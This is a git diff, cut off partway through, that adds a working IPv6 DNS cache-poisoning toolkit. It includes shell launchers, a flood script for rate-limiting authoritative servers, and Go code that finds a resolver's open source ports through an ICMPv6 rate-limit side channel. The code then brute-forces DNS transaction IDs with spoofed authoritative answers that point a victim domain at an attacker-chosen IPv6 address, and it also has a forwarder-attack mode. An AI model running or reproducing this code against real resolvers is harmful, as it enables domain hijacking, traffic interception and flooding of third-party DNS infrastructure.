diff options
Diffstat (limited to 'att script/4_v6_注入/code')
| -rw-r--r-- | att script/4_v6_注入/code/attack.sh | 3 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/dns_OPT.bin | bin | 0 -> 11 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/dns_end.bin | bin | 0 -> 5 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/dns_query.sh | 8 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/dns_start.bin | bin | 0 -> 10 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/attack.go | 685 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/dns.go | 261 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/go.mod | 15 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/go.sum | 25 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/ipv6util.go | 103 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/library.go | 171 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/go.mod | 20 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/go.sum | 38 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/ipv6util.go | 103 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/main.go | 192 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/start.sh | 38 |
16 files changed, 1662 insertions, 0 deletions
diff --git a/att script/4_v6_注入/code/attack.sh b/att script/4_v6_注入/code/attack.sh new file mode 100644 index 0000000..d67ca19 --- /dev/null +++ b/att script/4_v6_注入/code/attack.sh @@ -0,0 +1,3 @@ +chmod 777 ./start.sh +chmod 777 ./dns_query.sh +./start.sh $1 $2 $3 $4 $5
\ No newline at end of file diff --git a/att script/4_v6_注入/code/dns_OPT.bin b/att script/4_v6_注入/code/dns_OPT.bin Binary files differnew file mode 100644 index 0000000..e0dcbc1 --- /dev/null +++ b/att script/4_v6_注入/code/dns_OPT.bin diff --git a/att script/4_v6_注入/code/dns_end.bin b/att script/4_v6_注入/code/dns_end.bin Binary files differnew file mode 100644 index 0000000..8aa4774 --- /dev/null +++ b/att script/4_v6_注入/code/dns_end.bin diff --git a/att script/4_v6_注入/code/dns_query.sh b/att script/4_v6_注入/code/dns_query.sh new file mode 100644 index 0000000..dbc0266 --- /dev/null +++ b/att script/4_v6_注入/code/dns_query.sh @@ -0,0 +1,8 @@ +# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] domain... (e.g. www google com) +# write the domain name into the binary +echo "初始化工具环境" +# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power. +# fire! +go version +echo "尝试触发权威服务器请求速率限制" +./flood -i $4 -saddr $2 -taddr $1 -q $3 diff --git a/att script/4_v6_注入/code/dns_start.bin b/att script/4_v6_注入/code/dns_start.bin Binary files differnew file mode 100644 index 0000000..e6e4242 --- /dev/null +++ b/att script/4_v6_注入/code/dns_start.bin diff --git a/att script/4_v6_注入/code/src/fakedns6/attack.go b/att script/4_v6_注入/code/src/fakedns6/attack.go new file mode 100644 index 0000000..6cc6f87 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/attack.go @@ -0,0 +1,685 @@ +package main + +import ( + "flag" + "fmt" + "github.com/google/gopacket" + "log" + "math/rand" + "net" + "os" + "strconv" + "sync" + "time" + + "github.com/google/gopacket/layers" + "github.com/google/gopacket/pcap" + "github.com/google/gopacket/routing" +) + +var handle *pcap.Handle +var ethernetLayer *layers.Ethernet +var victimDNSName string +var dnsQueryName string +var authIP net.IP +var resolverIP net.IP +var localIP []net.IP +var defaultJitter uint +var gotReply = false +var attackerControlledDomain string +var attackForwarder bool +var repeatTimes int +var timeGap uint +var attTargetAddr string +var soaName string + +var jitter uint = 10 +var rtt uint = 1 // in ms +var debugOutput = true + +const GROUP_SIZE = 50 + +/* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */ +//var sendingChannel chan *outgoingPacket +var backendResolvers = make([]*backendResolver, 0) +var bruteForceShouldBeKilled = false + +type backendResolver = struct { + resolverBackendIP net.IP + + // [端口组ID][端口] + groups [][]uint16 // = make([][]uint16, 65536) + groupIDCounter uint32 // = 3 + groupIDCounterLock *sync.Mutex + groupSendTime []time.Time // = make([]time.Time, 65536) + + probeChannel chan uint32 //= make(chan uint16, 655) + priorityProbeChannel chan uint32 //= make(chan uint16, 655) + alwaysOpenPorts []bool //= make([]bool, 65536) + + perIPLimitCounter []int //= 6 + + networkXmitLock *sync.Mutex +} + +// timeout in ms, 持续触发查询请求 +func dnsRequestSender(timeout uint) { + for { + gotReply = false + sendDNSRequest(uint16(rand.Uint32()), dnsQueryName) + retryTimes := timeout / 500 + for { + if !gotReply { + time.Sleep(500 * time.Millisecond) + retryTimes-- + if retryTimes == 0 { + break + } + } else { + if debugOutput { + fmt.Println("接收到响应 ", timeout-retryTimes*500, "ms") + } else { + fmt.Println("Rx") + } + break + } + } + if !attackForwarder { + //dnsQueryName = strconv.Itoa(rand.Int()) + "." + victimDNSName + dnsQueryName = victimDNSName + } else { + /* I'm not sure if we should change the nonce. */ + dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain + } + } +} + +func receivingThread() { + for { + data, captureInfo, err := handle.ReadPacketData() + if err == pcap.NextErrorTimeoutExpired { + continue + } else if err != nil { + log.Printf("error reading packet: %v", err) + continue + } + + // Parse the packet. We'd use DecodingLayerParser here if we + // wanted to be really fast. + packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy) + + // Find the packets we care about, and print out logging + // information about them. All others are ignored. + if rspNet := packet.NetworkLayer(); rspNet == nil { + continue + } else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil { + continue + //} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil { + } else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil { + continue + } else if rspIP.NextHeader != layers.IPProtocolICMPv6 { + if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 { + rspUDPLayer := packet.Layer(layers.LayerTypeUDP) + if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 { + rspDNSLayer := packet.Layer(layers.LayerTypeDNS) + if rspDNSLayer != nil { + rspDNS := rspDNSLayer.(*layers.DNS) + if rspDNS.QR == true { + if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName && + string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName { + fmt.Println("Success!!") + os.Exit(0) + } else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr { + for _, record := range rspDNS.Answers { + if record.Type == layers.DNSTypeAAAA { + fmt.Println("AAAA记录修改成功!!") + os.Exit(0) + } + } + } else if string(rspDNS.Questions[0].Name) == dnsQueryName { + gotReply = true + } + } + } + } + } + continue + } else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil { + continue + } else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok { + continue + } else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) && + rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) { + continue + } else if nestedIpData := rspICMP.Payload; nestedIpData == nil { + continue + } else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil { + continue + } else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil { + continue + } else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil { + continue + } else { + r := getBackendResolver(nestedIp.DstIP) + if r != nil { + + nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP) + if nestedUDPLayer == nil { + fmt.Println("nestedUDPLayer == nil") + continue + } + nestedUDP := nestedUDPLayer.(*layers.UDP) + if nestedUDP == nil { + fmt.Println("nestedUDP == nil") + continue + } + + //got verification packet back + if nestedIp.FlowLabel > 1 { + //update rtt + /* Potential BUG: rtt of both resolver may not be the same. */ + newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1 + if newrtt >= 0 && newrtt < 5000 { + var draftJitter uint = 0 + if uint(newrtt) > rtt { + draftJitter = uint(newrtt) - rtt + } else { + draftJitter = (jitter + (rtt - uint(newrtt))) / 2 + } + if jitter > 30 { + fmt.Println("Jitter > 30ms!") + jitter = 10 + } else { + jitter = draftJitter + } + rtt = uint(newrtt) + if debugOutput { + fmt.Println("rtt=", rtt, ", jitter=", jitter) + } + } else { + fmt.Println("newrtt error:", newrtt) + } + //reduce ratelimit counter + localIPNum := getLocalIPNum(nestedIp.SrcIP) + if localIPNum != -1 { + if r.perIPLimitCounter[localIPNum] >= 0 { + r.perIPLimitCounter[localIPNum]-- + } + if r.perIPLimitCounter[localIPNum] < 0 { + if debugOutput { + /* This may happen in real attacks. Don't panic :). */ + fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0") + } + } + if debugOutput { + fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum]) + } + } else { + if debugOutput { + fmt.Println("received unwanted ICMP for", nestedIp.SrcIP) + } + } + //process the packet + binarySearch(r, nestedIp.FlowLabel) + } + } + } + } +} + +func binarySearch(r *backendResolver, flowlabel uint32) { + groupLen := 0 + group := r.groups[flowlabel] + + for _, port := range group { + if port != 65535 { + groupLen++ + } else { + break + } + } + + if groupLen == 1 { + //brute force + r.networkXmitLock.Lock() + fmt.Println("猜测开放端口为: " + strconv.Itoa(int(group[0]))) + dnsBruteForce(group[0], timeGap, r.resolverBackendIP, attTargetAddr) + r.networkXmitLock.Unlock() + r.alwaysOpenPorts[group[0]] = true + } else if groupLen > 1 { + var repeatTimes1 int + if repeatTimes > 1 { + repeatTimes1 = repeatTimes + 1 + } else { + repeatTimes1 = 1 + } + for j := 0; j < repeatTimes1; j++ { + //二分法定位开放端口 + //left + id := allocateGroupID(r) + r.groups[id] = make([]uint16, groupLen/2) + copy(r.groups[id], group[0:groupLen/2]) + for len(r.groups[id]) < GROUP_SIZE { + r.groups[id] = append(r.groups[id], 65535) + } + if debugOutput { + fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2) + } else { + fmt.Println("Found something interesting!") + } + r.priorityProbeChannel <- flowlabel + + //right + id = allocateGroupID(r) + r.groups[id] = make([]uint16, groupLen-groupLen/2) + copy(r.groups[id], group[groupLen/2:groupLen]) + for len(r.groups[id]) < GROUP_SIZE { + r.groups[id] = append(r.groups[id], 65535) + } + //fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2) + r.priorityProbeChannel <- flowlabel + } + } else { + if debugOutput { + fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel) + for _, port := range group { + fmt.Print(port) + } + } + } +} + +func perIPLimitRecover(r *backendResolver, num int) { + for { + if r.perIPLimitCounter[num] < 6 { + time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond) + r.perIPLimitCounter[num]++ + } else { + time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond) + } + } +} + +func probeSender(r *backendResolver) { + for { + + var flow uint32 + select { + case flow = <-r.priorityProbeChannel: + break + case flow = <-r.probeChannel: + break + //default: + // time.Sleep(time.Microsecond) + } + + // 当所有IP都测试过且端口组中只有一个端口时,进行TXID暴力破解 + if getIPwithAvailableCounter(r) == nil && r.groups[flow][1] == 65535 { + //brute force + fmt.Println("猜测开放端口为:" + strconv.Itoa(int(r.groups[flow][0]))) + fmt.Println("开始爆破事务ID") + r.networkXmitLock.Lock() + dnsBruteForce(r.groups[flow][0], timeGap, r.resolverBackendIP, attTargetAddr) + r.networkXmitLock.Unlock() + r.alwaysOpenPorts[r.groups[flow][0]] = true + continue + } + // 测试每个IP的速率限制 + var verifyIP net.IP + for { + verifyIP = getIPwithAvailableCounter(r) + if verifyIP == nil { + time.Sleep(time.Millisecond) + } else { + break + } + } + + //send + ports := r.groups[flow] + r.networkXmitLock.Lock() + for i := 0; i < GROUP_SIZE; i++ { + if defaultJitter <= 3 { + if attackForwarder { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 100) + } else { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 1) + } + } else { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 0) + } + } + time.Sleep(time.Duration(defaultJitter) * time.Millisecond) + // 验证 + xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, flow, 10) + r.groupSendTime[flow] = time.Now() + if rand.Uint32()%100 < 2 { + if debugOutput { + fmt.Println("目标"+r.resolverBackendIP.String(), "探测中", "当前端口范围"+strconv.Itoa(int(ports[0]))+"~~"+strconv.Itoa(int(ports[0]+49))) + } else { + fmt.Println("开放端口猜测中,请稍后...") + } + } + + // 等待全局计数器恢复 + if !attackForwarder { + time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond) + } else { + /* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */ + time.Sleep(time.Duration(60) * time.Millisecond) + } + r.networkXmitLock.Unlock() + } +} + +// 划分端口 +func portGroupFormer(r *backendResolver, startPort uint, endPort uint) { + for { + //divide into groups + var id uint32 = 0 + var currentGroupSize = 0 + + for i := startPort; i <= endPort; i++ { + // 端口不太可能用于进一步的查询。但这仍然是可能的。如果觉得端口重用不太可能发生,请在这里取消注释 + if r.alwaysOpenPorts[i] { + continue + } + if currentGroupSize%GROUP_SIZE == 0 { + if id != 0 { + r.probeChannel <- id + for j := 1; j < repeatTimes; j++ { + //dup + previd := id + id = allocateGroupID(r) + r.groups[id] = make([]uint16, len(r.groups[previd])) + copy(r.groups[id], r.groups[previd]) + r.probeChannel <- id + } + } + + id = allocateGroupID(r) + r.groups[id] = make([]uint16, 0) + } + + r.groups[id] = append(r.groups[id], uint16(i)) + currentGroupSize++ + } + + //deal with last several cases + if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 { + for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 { + r.groups[id] = append(r.groups[id], 65535) + } + + r.probeChannel <- id + + for j := 1; j < repeatTimes; j++ { + //dup + previd := id + id = allocateGroupID(r) + r.groups[id] = make([]uint16, len(r.groups[previd])) + copy(r.groups[id], r.groups[previd]) + r.probeChannel <- id + } + } + } +} + +func main() { + + /* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */ + /* IPv4 is not supported yet. */ + /* Use "-h to get usage. " */ + /* Attaching PoC? */ + /* Add Paper Bio? */ + ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.") + /* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */ + // gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac") + authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.") + resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.") + resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.") + resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.") + startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.") + endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.") + victimDNSName := flag.String("n", "", "The domain name to be poisoned.") + dnsQueryTimeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).") + defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.") + repeatTimes := flag.Int("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.") + timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.") + attTargetAddr := flag.String("ad", "", "想要篡改实现的结果") + debugOutput := flag.Bool("d", false, "调试输出模式.") + attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.") + soaName = *flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)") + + flag.Parse() + fmt.Println("侧信道脚本工作参数:") + fmt.Println("\t网络接口:" + *ifaceName) + fmt.Println("\t目标域名权威服务器地址:" + *authServer) + fmt.Println("\t目标服务器地址:" + *resolverBackend) + fmt.Println("\t目标域名:" + *victimDNSName) + fmt.Println("\t预期修改结果:" + *attTargetAddr) + //gatewayMac, _ := net.ParseMAC(*gateWayMacStr) + Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTimeout, *defaultJitter, + *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attTargetAddr, soaName) + os.Exit(0) +} + +func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint, + defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg int, timeGapArg uint, attTargetAddrArg string, + soaNameArg string) { + rand.Seed(time.Now().UnixNano()) + + handle, _ = pcap.OpenLive( + ifaceName, + 65536, + true, + pcap.BlockForever, + ) + err := handle.SetBPFFilter("not host " + authIPArg.To16().String()) + if err != nil { + fmt.Println("cannot set BPF filter.") + } + + iface, err := net.InterfaceByName(ifaceName) + if err != nil { + fmt.Println("cannot open network interface") + os.Exit(1) + } + // 是否攻击转发器 + if attackerMaliciousDomainArg != "" { + attackForwarder = true + fmt.Println("转发器攻击模式!") + attackerControlledDomain = attackerMaliciousDomainArg + } + + // 参数赋值 + authIP = authIPArg + resolverIP = resolverIPArg + victimDNSName = victimDNSNameArg + debugOutput = debugOutputArg + timeGap = timeGapArg + attTargetAddr = attTargetAddrArg + soaName = soaNameArg + + localIP, _ = GetIfaceAddrMulti(iface) + nonce := strconv.Itoa(rand.Int()) + + if !attackForwarder { + //dnsQueryName = nonce + "." + victimDNSName + dnsQueryName = victimDNSName + } else { + dnsQueryName = nonce + "." + attackerControlledDomain + } + + defaultJitter = defaultJitterArg + repeatTimes = repeatTimesArg + + if resolverBackendList != "" { + file, err := os.Open(resolverBackendList) + if err != nil { + fmt.Println(err) + os.Exit(10) + } + for { + var resolverIP string + n, err := fmt.Fscanf(file, "%s", &resolverIP) + if n <= 0 || err != nil { + break + } + backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP))) + } + } else { + //r1 shouldn't be nil + r1 := backendResolverBuilder(resolverBackendIPArg) + backendResolvers = append(backendResolvers, r1) + } + + //figure out MAC address + //test if it's in LAN first + // dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16()) + gwIP, err := getv6Gateway() + dstMac, err := getGatewayV6Mac(ifaceName, gwIP) + if err == nil { + ethernetLayer = &layers.Ethernet{ + SrcMAC: iface.HardwareAddr, + DstMAC: dstMac, + //EthernetType: layers.EthernetTypeIPv4, + EthernetType: layers.EthernetTypeIPv6, + } + fmt.Println("\t目的Mac地址为:", dstMac) + } else { + //query routing table + router, err := routing.New() + if err != nil { + fmt.Println(err) + os.Exit(4) + } + _, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP) + if err != nil { + fmt.Println(err) + os.Exit(5) + } + dstMac, err := GetGatewayAddr(iface, handle, nextHopIP.To16()) + if err != nil { + fmt.Println(err) + os.Exit(6) + } + fmt.Println("MAC:", dstMac) + ethernetLayer = &layers.Ethernet{ + SrcMAC: iface.HardwareAddr, + DstMAC: dstMac, + //EthernetType: layers.EthernetTypeIPv4, + EthernetType: layers.EthernetTypeIPv6, + } + } + + // 开启接收线程,处理响应包判断攻击状态 + go receivingThread() + + for i, ip := range localIP { + // 只使用公网IP + if !ip.IsLoopback() { + if debugOutput { + fmt.Println("可用 IP", ip) + } + for _, r := range backendResolvers { + go perIPLimitRecover(r, i) + } + } + } + // 发送dns查询请求,触发端口开放 + go dnsRequestSender(dnsQueryTimeout) + + for _, r := range backendResolvers { + // 猜测端口 + go probeSender(r) + // 端口范围组合 + go portGroupFormer(r, startPort, endPort) + time.Sleep(25 * time.Millisecond) + } + + time.Sleep(999 * time.Hour) + +} + +func allocateGroupID(r *backendResolver) uint32 { + r.groupIDCounterLock.Lock() + id := r.groupIDCounter + r.groupIDCounter++ + if r.groupIDCounter == 0 { + r.groupIDCounter = 3 + } + r.groupIDCounterLock.Unlock() + return id +} + +func getBackendResolver(resolverIP net.IP) *backendResolver { + for _, r := range backendResolvers { + if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 { + return r + } + } + return nil +} + +func lockNetwork() { + for _, r := range backendResolvers { + r.networkXmitLock.Lock() + } +} + +func unlockNetwork() { + for _, r := range backendResolvers { + r.networkXmitLock.Unlock() + } +} + +func getLocalIPNum(ip net.IP) int { + for i, localip := range localIP { + if compareIPv6Addr(localip, ip) == 0 { + return i + } + } + return -1 +} + +func backendResolverBuilder(backendIP net.IP) *backendResolver { + + if backendIP == nil { + return nil + } + temp := backendResolver{ + resolverBackendIP: backendIP, + groups: make([][]uint16, 65536), + groupIDCounter: 3, + groupIDCounterLock: &sync.Mutex{}, + groupSendTime: make([]time.Time, 65536), + probeChannel: make(chan uint32, 655), + priorityProbeChannel: make(chan uint32, 655), + alwaysOpenPorts: make([]bool, 65536), + perIPLimitCounter: make([]int, len(localIP)), + networkXmitLock: &sync.Mutex{}, + } + for i := range temp.perIPLimitCounter { + temp.perIPLimitCounter[i] = 6 + } + for i := 0; i < 65536; i++ { + temp.alwaysOpenPorts[i] = false + } + temp.alwaysOpenPorts[53] = true + temp.alwaysOpenPorts[0] = true + temp.alwaysOpenPorts[65535] = true + return &temp + +} + +// distribute verification to multiple IPs evenly +func getIPwithAvailableCounter(r *backendResolver) net.IP { + seed := rand.Int() % len(localIP) + for i := 0; i < len(localIP); i++ { + if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 { + return localIP[(i+seed)%len(localIP)] + } + } + return nil +} diff --git a/att script/4_v6_注入/code/src/fakedns6/dns.go b/att script/4_v6_注入/code/src/fakedns6/dns.go new file mode 100644 index 0000000..c29f9f9 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/dns.go @@ -0,0 +1,261 @@ +package main + +import ( + "fmt" + "math/rand" + "net" + "time" + + "github.com/google/gopacket/layers" +) + +var bruteForceCouldBeKilled bool + +func sendDNSRequest(id uint16, name string) { + if debugOutput { + fmt.Println("Send new DNS request", name, id) + } + _sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53) +} + +func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) { + ipLayer := layers.IPv6{ + FlowLabel: 1, + SrcIP: src, + DstIP: dst, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + //Flags: layers.IPv4DontFragment, + } + udpLayer := layers.UDP{ + SrcPort: sport, + DstPort: dport, + } + dnsLayer := layers.DNS{ + ID: id, + QR: false, + OpCode: 0, + AA: false, + TC: false, + RD: true, + RA: false, + Z: 0, + ResponseCode: 0, + QDCount: 1, + ANCount: 0, + NSCount: 0, + ARCount: 0, + Questions: []layers.DNSQuestion{{ + Name: []byte(name), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }}, + Authorities: nil, + Additionals: nil, + } + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err) + } + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ sendDNSRequest: ", err) + } +} + +func bruteForceTerminatingTimer(timegap uint) { + time.Sleep(time.Duration(timegap) * time.Millisecond) + bruteForceCouldBeKilled = true +} + +func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, attTargetAddr string) { + bruteForceShouldBeKilled = true + bruteForceCouldBeKilled = false + ipLayer := layers.IPv6{ + FlowLabel: 2, + SrcIP: authIP, + DstIP: resolverBackendIP, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + //Flags: layers.IPv4DontFragment, + } + udpLayer := layers.UDP{ + SrcPort: 53, + DstPort: layers.UDPPort(targetPort), + } + dnsLayer := layers.DNS{ + ID: 0, + QR: true, + OpCode: 0, + AA: true, + TC: false, + RD: false, + RA: false, + Z: 0, + ResponseCode: layers.DNSResponseCodeNoErr, + } + + if !attackForwarder { + dnsLayer.Questions = []layers.DNSQuestion{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }} + // 原方案:将域名NS篡改到attacker的服务器上 + //dnsLayer.Authorities = []layers.DNSResourceRecord{{ + // Name: []byte(victimDNSName), + // Type: layers.DNSTypeNS, + // Class: layers.DNSClassIN, + // TTL: 300, + // IP: nil, + // NS: []byte(auxDomain), + // CNAME: nil, + // PTR: nil, + // TXTs: nil, + // SOA: layers.DNSSOA{}, + // SRV: layers.DNSSRV{}, + // MX: layers.DNSMX{}, + // OPT: nil, + // TXT: nil, + //}} + //dnsLayer.Answers = nil + //dnsLayer.Additionals = nil + dnsLayer.Authorities = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeNS, + Class: layers.DNSClassIN, + TTL: 300, + IP: nil, + // 暂时写死 + NS: []byte("nsv6.n64.top"), + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + dnsLayer.Answers = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + TTL: 300, + /* Fill with any IP you want. The victim domain will be hijacked to this IP. */ + IP: net.ParseIP(attTargetAddr), + NS: nil, + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + dnsLayer.Additionals = nil + } else { + /* Change these flags accordingly to the request sent by the resolver. */ + dnsLayer.AA = false + dnsLayer.RD = true + dnsLayer.RA = true + dnsLayer.Questions = []layers.DNSQuestion{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }} + dnsLayer.Answers = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeCNAME, + Class: layers.DNSClassIN, + TTL: 300, + IP: nil, + NS: nil, + CNAME: []byte(victimDNSName), + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }, { + Name: []byte(victimDNSName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + TTL: 300, + /* Fill with any IP you want. The victim domain will be hijacked to this IP. */ + IP: net.ParseIP(attTargetAddr), + NS: nil, + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + } + + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err) + } + if debugOutput { + fmt.Println("DNS BruteForce: ", targetPort) + } + + startTime := time.Now() + var txid uint16 + //try to see if this port is open in reality + for txid = 0; txid < GROUP_SIZE*2; txid++ { + dnsLayer.ID = txid + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err) + } + time.Sleep(time.Duration(timegap) * time.Microsecond) + } + + /* This is used for early termination */ + //verification packet + //xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0) + //go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60) + + //continue brute force + for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ { + /* This is used for early termination */ + //if bruteForceCouldBeKilled && bruteForceShouldBeKilled { + // fmt.Println("DNS Brute force aborted") + // break + //} + dnsLayer.ID = txid + err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ DNSBruteForce: ", err) + } + if timegap != 0 { + time.Sleep(time.Duration(timegap) * time.Microsecond) + } + } + + //0xffff is missing from packet trace + /* This is used for early termination */ + //if !bruteForceShouldBeKilled { + dnsLayer.ID = 0xffff + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err) + } + //} + if debugOutput { + fmt.Println("time: ", time.Now().Sub(startTime)) + } + + //help to recover the global counter + time.Sleep(time.Duration(60+ /*jitter + 